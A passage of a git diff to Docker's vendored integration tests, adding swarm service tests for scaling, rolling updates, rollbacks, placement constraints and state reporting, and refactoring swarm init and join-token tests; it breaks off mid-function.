+	"context"
+	"fmt"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
+	"github.com/go-check/check"
+	"golang.org/x/sys/unix"
+	"gotest.tools/icmd"
+)
+
+func setPortConfig(portConfig []swarm.PortConfig) testdaemon.ServiceConstructor {
+	return func(s *swarm.Service) {
+		if s.Spec.EndpointSpec == nil {
+			s.Spec.EndpointSpec = &swarm.EndpointSpec{}
+		}
+		s.Spec.EndpointSpec.Ports = portConfig
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPIServiceUpdatePort(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a service with a port mapping of 8080:8081.
+	portConfig := []swarm.PortConfig{{TargetPort: 8081, PublishedPort: 8080}}
+	serviceID := d.CreateService(c, simpleTestService, setInstances(1), setPortConfig(portConfig))
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+
+	// Update the service: changed the port mapping from 8080:8081 to 8082:8083.
+	updatedPortConfig := []swarm.PortConfig{{TargetPort: 8083, PublishedPort: 8082}}
+	remoteService := d.GetService(c, serviceID)
+	d.UpdateService(c, remoteService, setPortConfig(updatedPortConfig))
+
+	// Inspect the service and verify port mapping.
+	updatedService := d.GetService(c, serviceID)
+	c.Assert(updatedService.Spec.EndpointSpec, check.NotNil)
+	c.Assert(len(updatedService.Spec.EndpointSpec.Ports), check.Equals, 1)
+	c.Assert(updatedService.Spec.EndpointSpec.Ports[0].TargetPort, check.Equals, uint32(8083))
+	c.Assert(updatedService.Spec.EndpointSpec.Ports[0].PublishedPort, check.Equals, uint32(8082))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	services := d.ListServices(c)
+	c.Assert(services, checker.NotNil)
+	c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services))
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	instances := 2
+	id := d.CreateService(c, simpleTestService, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
+
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	options := types.ServiceInspectOptions{InsertDefaults: true}
+
+	// insertDefaults inserts UpdateConfig when service is fetched by ID
+	resp, _, err := cli.ServiceInspectWithRaw(context.Background(), id, options)
+	out := fmt.Sprintf("%+v", resp)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "UpdateConfig")
+
+	// insertDefaults inserts UpdateConfig when service is fetched by ID
+	resp, _, err = cli.ServiceInspectWithRaw(context.Background(), "top", options)
+	out = fmt.Sprintf("%+v", resp)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(out), checker.Contains, "UpdateConfig")
+
+	service := d.GetService(c, id)
+	instances = 5
+	d.UpdateService(c, service, setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances)
+
+	d.RemoveService(c, service.ID)
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks
+
+	instances := 9
+	id := d1.CreateService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.GreaterThan, 0)
+	waitAndAssert(c, defaultReconciliationTimeout, d3.CheckActiveContainerCount, checker.GreaterThan, 0)
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
+
+	// reconciliation on d2 node down
+	d2.Stop(c)
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
+
+	// test downscaling
+	instances = 5
+	d1.UpdateService(c, d1.GetService(c, id), setInstances(instances))
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
+
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
+
+	d1.CreateService(c, simpleTestService, setGlobalMode)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d3.CheckActiveContainerCount, checker.Equals, 1)
+
+	d4 := s.AddDaemon(c, true, false)
+	d5 := s.AddDaemon(c, true, false)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d4.CheckActiveContainerCount, checker.Equals, 1)
+	waitAndAssert(c, defaultReconciliationTimeout, d5.CheckActiveContainerCount, checker.Equals, 1)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*daemon.Daemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount)
+
+	// service image at start
+	image1 := "busybox:latest"
+	// target image in update
+	image2 := "busybox:test"
+
+	// create a different tag
+	for _, d := range daemons {
+		out, err := d.Cmd("tag", image1, image2)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+	}
+
+	// create service
+	instances := 5
+	parallelism := 2
+	rollbackParallelism := 3
+	id := daemons[0].CreateService(c, serviceForUpdate, setInstances(instances))
+
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+
+	// issue service update
+	service := daemons[0].GetService(c, id)
+	daemons[0].UpdateService(c, service, setImage(image2))
+
+	// first batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - parallelism, image2: parallelism})
+
+	// 2nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism})
+
+	// 3nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances})
+
+	// Roll back to the previous version. This uses the CLI because
+	// rollback used to be a client-side operation.
+	out, err := daemons[0].Cmd("service", "update", "--detach", "--rollback", id)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// first batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances - rollbackParallelism, image1: rollbackParallelism})
+
+	// 2nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateStartFirst(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// service image at start
+	image1 := "busybox:latest"
+	// target image in update
+	image2 := "testhealth:latest"
+
+	// service started from this image won't pass health check
+	result := cli.BuildCmd(c, image2, cli.Daemon(d),
+		build.WithDockerfile(`FROM busybox
+		HEALTHCHECK --interval=1s --timeout=30s --retries=1024 \
+		  CMD cat /status`),
+	)
+	result.Assert(c, icmd.Success)
+
+	// create service
+	instances := 5
+	parallelism := 2
+	rollbackParallelism := 3
+	id := d.CreateService(c, serviceForUpdate, setInstances(instances), setUpdateOrder(swarm.UpdateOrderStartFirst), setRollbackOrder(swarm.UpdateOrderStartFirst))
+
+	checkStartingTasks := func(expected int) []swarm.Task {
+		var startingTasks []swarm.Task
+		waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+			tasks := d.GetServiceTasks(c, id)
+			startingTasks = nil
+			for _, t := range tasks {
+				if t.Status.State == swarm.TaskStateStarting {
+					startingTasks = append(startingTasks, t)
+				}
+			}
+			return startingTasks, nil
+		}, checker.HasLen, expected)
+
+		return startingTasks
+	}
+
+	makeTasksHealthy := func(tasks []swarm.Task) {
+		for _, t := range tasks {
+			containerID := t.Status.ContainerStatus.ContainerID
+			d.Cmd("exec", containerID, "touch", "/status")
+		}
+	}
+
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+
+	// issue service update
+	service := d.GetService(c, id)
+	d.UpdateService(c, service, setImage(image2))
+
+	// first batch
+
+	// The old tasks should be running, and the new ones should be starting.
+	startingTasks := checkStartingTasks(parallelism)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+
+	// make it healthy
+	makeTasksHealthy(startingTasks)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - parallelism, image2: parallelism})
+
+	// 2nd batch
+
+	// The old tasks should be running, and the new ones should be starting.
+	startingTasks = checkStartingTasks(parallelism)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - parallelism, image2: parallelism})
+
+	// make it healthy
+	makeTasksHealthy(startingTasks)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism})
+
+	// 3nd batch
+
+	// The old tasks should be running, and the new ones should be starting.
+	startingTasks = checkStartingTasks(1)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism})
+
+	// make it healthy
+	makeTasksHealthy(startingTasks)
+
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances})
+
+	// Roll back to the previous version. This uses the CLI because
+	// rollback is a client-side operation.
+	out, err := d.Cmd("service", "update", "--detach", "--rollback", id)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// first batch
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image2: instances - rollbackParallelism, image1: rollbackParallelism})
+
+	// 2nd batch
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*daemon.Daemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount)
+
+	// service image at start
+	image1 := "busybox:latest"
+	// target image in update
+	image2 := "busybox:badtag"
+
+	// create service
+	instances := 5
+	id := daemons[0].CreateService(c, serviceForUpdate, setInstances(instances))
+
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+
+	// issue service update
+	service := daemons[0].GetService(c, id)
+	daemons[0].UpdateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1))
+
+	// should update 2 tasks and then pause
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused)
+	v, _ := daemons[0].CheckServiceRunningTasks(id)(c)
+	c.Assert(v, checker.Equals, instances-2)
+
+	// Roll back to the previous version. This uses the CLI because
+	// rollback used to be a client-side operation.
+	out, err := daemons[0].Cmd("service", "update", "--detach", "--rollback", id)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckRunningTaskImages, checker.DeepEquals,
+		map[string]int{image1: instances})
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*daemon.Daemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount)
+
+	// create service
+	constraints := []string{"node.role==worker"}
+	instances := 3
+	id := daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances)
+	// validate tasks are running on worker nodes
+	tasks := daemons[0].GetServiceTasks(c, id)
+	for _, task := range tasks {
+		node := daemons[0].GetNode(c, task.NodeID)
+		c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker)
+	}
+	//remove service
+	daemons[0].RemoveService(c, id)
+
+	// create service
+	constraints = []string{"node.role!=worker"}
+	id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances)
+	tasks = daemons[0].GetServiceTasks(c, id)
+	// validate tasks are running on manager nodes
+	for _, task := range tasks {
+		node := daemons[0].GetNode(c, task.NodeID)
+		c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager)
+	}
+	//remove service
+	daemons[0].RemoveService(c, id)
+
+	// create service
+	constraints = []string{"node.role==nosuchrole"}
+	id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks created
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances)
+	// let scheduler try
+	time.Sleep(250 * time.Millisecond)
+	// validate tasks are not assigned to any node
+	tasks = daemons[0].GetServiceTasks(c, id)
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, "")
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*daemon.Daemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount)
+	nodes := daemons[0].ListNodes(c)
+	c.Assert(len(nodes), checker.Equals, nodeCount)
+
+	// add labels to nodes
+	daemons[0].UpdateNode(c, nodes[0].ID, func(n *swarm.Node) {
+		n.Spec.Annotations.Labels = map[string]string{
+			"security": "high",
+		}
+	})
+	for i := 1; i < nodeCount; i++ {
+		daemons[0].UpdateNode(c, nodes[i].ID, func(n *swarm.Node) {
+			n.Spec.Annotations.Labels = map[string]string{
+				"security": "low",
+			}
+		})
+	}
+
+	// create service
+	instances := 3
+	constraints := []string{"node.labels.security==high"}
+	id := daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances)
+	tasks := daemons[0].GetServiceTasks(c, id)
+	// validate all tasks are running on nodes[0]
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, nodes[0].ID)
+	}
+	//remove service
+	daemons[0].RemoveService(c, id)
+
+	// create service
+	constraints = []string{"node.labels.security!=high"}
+	id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances)
+	tasks = daemons[0].GetServiceTasks(c, id)
+	// validate all tasks are NOT running on nodes[0]
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID)
+	}
+	//remove service
+	daemons[0].RemoveService(c, id)
+
+	constraints = []string{"node.labels.security==medium"}
+	id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks created
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances)
+	// let scheduler try
+	time.Sleep(250 * time.Millisecond)
+	tasks = daemons[0].GetServiceTasks(c, id)
+	// validate tasks are not assigned
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, "")
+	}
+	//remove service
+	daemons[0].RemoveService(c, id)
+
+	// multiple constraints
+	constraints = []string{
+		"node.labels.security==high",
+		fmt.Sprintf("node.id==%s", nodes[1].ID),
+	}
+	id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
+	// wait for tasks created
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances)
+	// let scheduler try
+	time.Sleep(250 * time.Millisecond)
+	tasks = daemons[0].GetServiceTasks(c, id)
+	// validate tasks are not assigned
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, "")
+	}
+	// make nodes[1] fulfills the constraints
+	daemons[0].UpdateNode(c, nodes[1].ID, func(n *swarm.Node) {
+		n.Spec.Annotations.Labels = map[string]string{
+			"security": "high",
+		}
+	})
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances)
+	tasks = daemons[0].GetServiceTasks(c, id)
+	for _, task := range tasks {
+		c.Assert(task.NodeID, checker.Equals, nodes[1].ID)
+	}
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicePlacementPrefs(c *check.C) {
+	const nodeCount = 3
+	var daemons [nodeCount]*daemon.Daemon
+	for i := 0; i < nodeCount; i++ {
+		daemons[i] = s.AddDaemon(c, true, i == 0)
+	}
+	// wait for nodes ready
+	waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount)
+	nodes := daemons[0].ListNodes(c)
+	c.Assert(len(nodes), checker.Equals, nodeCount)
+
+	// add labels to nodes
+	daemons[0].UpdateNode(c, nodes[0].ID, func(n *swarm.Node) {
+		n.Spec.Annotations.Labels = map[string]string{
+			"rack": "a",
+		}
+	})
+	for i := 1; i < nodeCount; i++ {
+		daemons[0].UpdateNode(c, nodes[i].ID, func(n *swarm.Node) {
+			n.Spec.Annotations.Labels = map[string]string{
+				"rack": "b",
+			}
+		})
+	}
+
+	// create service
+	instances := 4
+	prefs := []swarm.PlacementPreference{{Spread: &swarm.SpreadOver{SpreadDescriptor: "node.labels.rack"}}}
+	id := daemons[0].CreateService(c, simpleTestService, setPlacementPrefs(prefs), setInstances(instances))
+	// wait for tasks ready
+	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances)
+	tasks := daemons[0].GetServiceTasks(c, id)
+	// validate all tasks are running on nodes[0]
+	tasksOnNode := make(map[string]int)
+	for _, task := range tasks {
+		tasksOnNode[task.NodeID]++
+	}
+	c.Assert(tasksOnNode[nodes[0].ID], checker.Equals, 2)
+	c.Assert(tasksOnNode[nodes[1].ID], checker.Equals, 1)
+	c.Assert(tasksOnNode[nodes[2].ID], checker.Equals, 1)
+}
+
+func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	testRequires(c, DaemonIsLinux)
+
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, false)
+
+	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept
+
+	instances := 9
+	d1.CreateService(c, simpleTestService, setInstances(instances))
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
+
+	getContainers := func() map[string]*daemon.Daemon {
+		m := make(map[string]*daemon.Daemon)
+		for _, d := range []*daemon.Daemon{d1, d2, d3} {
+			for _, id := range d.ActiveContainers(c) {
+				m[id] = d
+			}
+		}
+		return m
+	}
+
+	containers := getContainers()
+	c.Assert(containers, checker.HasLen, instances)
+	var toRemove string
+	for i := range containers {
+		toRemove = i
+	}
+
+	_, err := containers[toRemove].Cmd("stop", toRemove)
+	c.Assert(err, checker.IsNil)
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
+
+	containers2 := getContainers()
+	c.Assert(containers2, checker.HasLen, instances)
+	for i := range containers {
+		if i == toRemove {
+			c.Assert(containers2[i], checker.IsNil)
+		} else {
+			c.Assert(containers2[i], checker.NotNil)
+		}
+	}
+
+	containers = containers2
+	for i := range containers {
+		toRemove = i
+	}
+
+	// try with killing process outside of docker
+	pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove)
+	c.Assert(err, checker.IsNil)
+	pid, err := strconv.Atoi(strings.TrimSpace(pidStr))
+	c.Assert(err, checker.IsNil)
+	c.Assert(unix.Kill(pid, unix.SIGKILL), checker.IsNil)
+
+	time.Sleep(time.Second) // give some time to handle the signal
+
+	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances)
+
+	containers2 = getContainers()
+	c.Assert(containers2, checker.HasLen, instances)
+	for i := range containers {
+		if i == toRemove {
+			c.Assert(containers2[i], checker.IsNil)
+		} else {
+			c.Assert(containers2[i], checker.NotNil)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go
index 1f8eaec6de..6a31dd209f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go
@@ -3,21 +3,31 @@
 package main
 
 import (
-	"encoding/json"
+	"context"
 	"fmt"
+	"io/ioutil"
+	"net"
 	"net/http"
-	"os"
 	"path/filepath"
-	"strconv"
 	"strings"
 	"sync"
-	"syscall"
 	"time"
 
+	"github.com/cloudflare/cfssl/csr"
+	"github.com/cloudflare/cfssl/helpers"
+	"github.com/cloudflare/cfssl/initca"
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/swarmkit/ca"
 	"github.com/go-check/check"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 var defaultReconciliationTimeout = 30 * time.Second
@@ -25,571 +35,237 @@ var defaultReconciliationTimeout = 30 * time.Second
 func (s *DockerSwarmSuite) TestAPISwarmInit(c *check.C) {
 	// todo: should find a better way to verify that components are running than /info
 	d1 := s.AddDaemon(c, true, true)
-	info, err := d1.info()
-	c.Assert(err, checker.IsNil)
+	info := d1.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.True)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(info.Cluster.RootRotationInProgress, checker.False)
 
 	d2 := s.AddDaemon(c, true, false)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.False)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 
 	// Leaving cluster
-	c.Assert(d2.Leave(false), checker.IsNil)
+	c.Assert(d2.SwarmLeave(false), checker.IsNil)
 
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.False)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
-	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: d1.joinTokens(c).Worker, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
+	d2.SwarmJoin(c, swarm.JoinRequest{
+		ListenAddr:  d1.SwarmListenAddr(),
+		JoinToken:   d1.JoinTokens(c).Worker,
+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
 
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.False)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 
 	// Current state restoring after restarts
-	err = d1.Stop()
-	c.Assert(err, checker.IsNil)
-	err = d2.Stop()
-	c.Assert(err, checker.IsNil)
+	d1.Stop(c)
+	d2.Stop(c)
 
-	err = d1.Start()
-	c.Assert(err, checker.IsNil)
-	err = d2.Start()
-	c.Assert(err, checker.IsNil)
+	d1.Start(c)
+	d2.Start(c)
 
-	info, err = d1.info()
-	c.Assert(err, checker.IsNil)
+	info = d1.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.True)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.False)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 }
 
 func (s *DockerSwarmSuite) TestAPISwarmJoinToken(c *check.C) {
 	d1 := s.AddDaemon(c, false, false)
-	c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil)
+	d1.SwarmInit(c, swarm.InitRequest{})
+
+	// todo: error message differs depending if some components of token are valid
 
 	d2 := s.AddDaemon(c, false, false)
-	err := d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}})
+	c2 := d2.NewClientT(c)
+	err := c2.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
 	c.Assert(err, checker.NotNil)
 	c.Assert(err.Error(), checker.Contains, "join token is necessary")
-	info, err := d2.info()
-	c.Assert(err, checker.IsNil)
+	info := d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
-	err = d2.Join(swarm.JoinRequest{JoinToken: "foobaz", RemoteAddrs: []string{d1.listenAddr}})
+	err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
+		JoinToken:   "foobaz",
+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
 	c.Assert(err, checker.NotNil)
-	c.Assert(err.Error(), checker.Contains, "join token is necessary")
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	c.Assert(err.Error(), checker.Contains, "invalid join token")
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
-	workerToken := d1.joinTokens(c).Worker
+	workerToken := d1.JoinTokens(c).Worker
 
-	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	d2.SwarmJoin(c, swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
+		JoinToken:   workerToken,
+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
-	c.Assert(d2.Leave(false), checker.IsNil)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	c.Assert(d2.SwarmLeave(false), checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
 	// change tokens
-	d1.rotateTokens(c)
+	d1.RotateTokens(c)
 
-	err = d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}})
+	err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
+		JoinToken:   workerToken,
